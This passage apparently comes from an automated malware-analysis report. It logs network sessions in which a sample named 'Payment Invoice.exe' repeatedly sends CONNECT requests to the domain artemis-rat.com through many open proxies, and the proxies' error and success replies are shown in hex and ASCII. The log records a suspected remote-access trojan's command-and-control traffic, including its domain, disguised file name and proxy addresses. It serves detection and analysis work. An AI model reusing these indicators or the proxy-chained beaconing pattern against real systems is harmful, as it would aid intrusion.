                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                176192.168.2.450264154.65.39.7807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.895081043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.646661043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.886352062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.183307886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.777148962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.277020931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.242289066 CET536INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 12:16:49 GMT
                                                                Server: Apache/2.4.38 (Debian)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                Mar 11, 2024 16:15:29.242301941 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at artemis-rat.com Port 443


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                177192.168.2.450502104.24.35.152807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.895205975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.049828053 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                178192.168.2.45041967.43.227.228195997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.895312071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.825906992 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                179192.168.2.450517104.27.83.183807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.897131920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.051563978 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                180192.168.2.450462199.58.185.941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.900396109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                181192.168.2.450539173.245.49.27807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.915359974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.069675922 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                182192.168.2.449757162.241.70.64494787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.916328907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                183192.168.2.450476162.243.102.20797647076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.916388035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                184192.168.2.450339193.239.56.8480817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.916462898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                185192.168.2.45036062.171.184.9631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.916491985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.644015074 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                186192.168.2.450321139.99.148.9031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.922080994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.278822899 CET536INHTTP/1.1 407 Proxy Authentication Required
                                                                Server: squid/3.5.20
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 3711
                                                                X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                Proxy-Authenticate: Basic realm="Squid Basic Authentication"
                                                                X-Cache: MISS from ns547184.ip-139-99-148.net
                                                                X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128
                                                                Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20)
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-/


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                187192.168.2.45047767.43.236.2033357076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.923443079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.076654911 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                188192.168.2.450350212.31.100.13841537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.930993080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                189192.168.2.450357186.124.164.213807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.937972069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.651659966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                190192.168.2.45039451.161.131.84492027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.944061995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                191192.168.2.450359173.249.29.24391237076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.945997000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.386293888 CET536INHTTP/1.1 503 Service Unavailable
                                                                Server: squid/3.5.27
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 3832
                                                                X-Squid-Error: ERR_DNS_FAIL 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                192192.168.2.45059131.43.179.160807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.950043917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.104602098 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                193192.168.2.450523142.54.231.3841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.954243898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                194192.168.2.4504598.218.100.12080807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.963280916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.620516062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.683129072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.559168100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.249051094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                195192.168.2.450391128.199.196.31271027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.963668108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                196192.168.2.45061066.225.246.23880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.965065002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                197192.168.2.450250124.163.236.5473027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.967456102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.886020899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                198192.168.2.45041291.148.127.16280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.968830109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                199192.168.2.450400202.162.219.1010807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.979372978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                200192.168.2.450616185.238.228.202807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.979783058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.133819103 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
